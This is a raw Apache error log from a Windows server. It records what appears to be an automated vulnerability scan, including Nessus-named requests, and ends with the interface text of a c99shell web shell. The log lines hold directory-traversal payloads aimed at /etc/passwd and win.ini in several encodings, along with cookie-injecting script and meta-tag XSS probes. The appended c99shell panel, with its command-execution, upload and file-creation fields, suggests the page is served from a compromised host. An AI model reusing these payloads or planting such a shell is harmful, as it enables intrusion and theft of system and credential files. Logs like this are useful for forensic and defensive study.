[Fri Mar 27 22:57:35.250279 2020] [core:error] [pid 12936:tid 18916] [client 172.22.2.1:12545] AH00126: Invalid URI in request GET /%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\windows\\win.ini HTTP/1.1
[Fri Mar 27 22:57:35.312679 2020] [core:error] [pid 12936:tid 18916] [client 172.22.2.1:12546] AH00126: Invalid URI in request GET /%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\winnt\\win.ini HTTP/1.1
[Fri Mar 27 22:58:04.016729 2020] [core:error] [pid 12936:tid 18916] [client 172.22.2.1:12555] AH00126: Invalid URI in request GET /././././././../../../../../windows/win.ini HTTP/1.1
[Fri Mar 27 22:58:06.247533 2020] [core:error] [pid 12936:tid 18856] [client 172.22.2.1:12604] AH00126: Invalid URI in request GET /././././././../../../../../winnt/win.ini HTTP/1.1
[Fri Mar 27 22:58:12.113143 2020] [core:error] [pid 12936:tid 19124] [client 172.22.2.1:12610] AH00126: Invalid URI in request GET /nessus\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
[Fri Mar 27 22:58:14.687148 2020] [core:error] [pid 12936:tid 19124] [client 172.22.2.1:12624] AH00126: Invalid URI in request GET /nessus\\..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
[Fri Mar 27 22:58:44.218000 2020] [core:error] [pid 12936:tid 18204] [client 172.22.2.1:12676] AH00126: Invalid URI in request GET /../../../../../../../../../../../../etc/passwd HTTP/1.1
[Fri Mar 27 22:58:45.341202 2020] [core:error] [pid 12936:tid 18388] [client 172.22.2.1:12706] AH00126: Invalid URI in request GET /./../../../../../../../../../../../etc/passwd HTTP/1.1
[Fri Mar 27 22:58:46.870004 2020] [core:error] [pid 12936:tid 18388] [client 172.22.2.1:12709] AH00126: Invalid URI in request GET //../../../../../../../../../../../../etc/passwd HTTP/1.1
[Fri Mar 27 22:58:49.912010 2020] [core:error] [pid 12936:tid 18388] [client 172.22.2.1:12719] AH00126: Invalid URI in request GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
[Fri Mar 27 22:58:54.077217 2020] [core:error] [pid 12936:tid 19124] [client 172.22.2.1:12740] AH00126: Invalid URI in request GET /././././././../../../../../etc/passwd HTTP/1.1
[Fri Mar 27 22:59:00.863229 2020] [core:error] [pid 12936:tid 18324] [client 172.22.2.1:12764] AH00126: Invalid URI in request GET ..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
[Fri Mar 27 22:59:01.830431 2020] [core:error] [pid 12936:tid 18324] [client 172.22.2.1:12771] AH00126: Invalid URI in request GET ..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
[Fri Mar 27 22:59:46.165708 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 22:59:59.659732 2020] [core:error] [pid 12936:tid 18324] [client 172.22.2.1:12892] AH00126: Invalid URI in request GET login?hsgid=00000000-0000-0000-0000-000000000000&hasFP=1 HTTP/1.1
[Fri Mar 27 23:00:40.375804 2020] [core:error] [pid 12936:tid 18292] [client 172.22.2.1:12518] AH00126: Invalid URI in request GET <script>document.cookie=%22testkjod=3046;%22</script> HTTP/1.1
[Fri Mar 27 23:00:47.536216 2020] [core:error] [pid 12936:tid 18292] [client 172.22.2.1:13041] AH00126: Invalid URI in request GET <meta%20http-equiv=Set-Cookie%20content=%22testkjod=3046%22> HTTP/1.1
[Fri Mar 27 23:01:34.273898 2020] [proxy:error] [pid 12936:tid 18516] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Fri Mar 27 23:01:34.273898 2020] [proxy_ajp:error] [pid 12936:tid 18516] [client 172.22.2.1:13144] AH00896: failed to make connection to backend: 127.0.0.1
[Fri Mar 27 23:01:35.100700 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 23:02:11.557964 2020] [cgi:error] [pid 12936:tid 18216] [client 172.22.2.1:13242] script not found or unable to stat: E:/nuevo/htdocs/home.asp
[Fri Mar 27 23:04:31.599410 2020] [cgi:error] [pid 12936:tid 17472] [client 172.22.2.1:13443] script not found or unable to stat: E:/nuevo/cgi-bin/kvm.cgi
[Fri Mar 27 23:05:11.145479 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 23:05:21.940698 2020] [core:error] [pid 12936:tid 18332] [client 172.22.2.1:13499] AH00126: Invalid URI in request GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
[Fri Mar 27 23:07:03.106876 2020] [core:error] [pid 12936:tid 18960] [client 172.22.2.1:13692] AH00126: Invalid URI in request GET /././.. HTTP/1.1
[Fri Mar 27 23:07:03.902477 2020] [core:error] [pid 12936:tid 18324] [client 172.22.2.1:13693] AH00126: Invalid URI in request GET ././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../ HTTP/1.1
[Fri Mar 27 23:07:05.088079 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 23:07:16.725700 2020] [core:error] [pid 12936:tid 18460] [client 172.22.2.1:13716] AH00126: Invalid URI in request GET /..\\pixfir~1\\how_to_login.html HTTP/1.1
[Fri Mar 27 23:07:18.145302 2020] [core:error] [pid 12936:tid 18360] [client 172.22.2.1:13719] AH00126: Invalid URI in request GET /..\\pixfir~1\\how_to_login.html HTTP/1.1
[Fri Mar 27 23:07:18.738103 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 23:08:10.171394 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Mar 27 23:18:18.868863 2020] [mpm_winnt:warn] [pid 12936:tid 19432] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--